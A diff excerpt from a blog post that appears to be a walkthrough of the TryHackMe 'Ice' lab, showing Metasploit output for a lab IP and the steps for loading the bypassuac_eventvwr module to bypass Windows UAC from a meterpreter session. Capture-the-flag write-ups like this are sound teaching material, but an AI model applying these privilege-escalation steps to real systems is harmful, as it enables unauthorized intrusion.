bharathkarumudi/bharathkarumudi.github.io/_posts/2020-07-20-Ice-thm-walkthrough.md

 [+] 10.10.88.122 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
 [+] 10.10.88.122 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
 ```
-From the results, the `exploit/windows/local/bypassuac_eventvwr` can be used to bypass the Windows UAC to esalate the privileges.
+From the results, the `exploit/windows/local/bypassuac_eventvwr` can be used to bypass the Windows UAC to escalate the privileges.

-Background the current session and note down the current session number by `sessions`.
+Background the current session (ctrl+z) and take a note of the current session number using `sessions` command from meterpreter.
-Load the exploit and set the LHOST and SESSION number that was recorded above.
+Load the exploit and set the LHOST and SESSION number to the one that was noted above.

 ```bash
 msf5> use exploit/windows/local/bypassuac_eventvwr